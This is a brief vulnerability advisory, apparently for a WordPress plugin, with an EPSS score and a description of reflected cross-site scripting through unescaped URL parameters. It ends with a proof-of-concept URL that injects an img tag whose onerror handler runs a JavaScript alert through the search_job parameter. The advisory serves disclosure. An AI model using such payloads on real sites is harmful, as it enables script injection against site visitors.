0.001 Low
EPSS
Percentile
35.4%
The plugin does not escape some URL parameters before outputting them back to the user, leading to Reflected Cross-Site Scripting
/?search_job="><img+src%3Dx+onerror%3Djavascript%3Aalert%28%60HoiWPScan%60%29>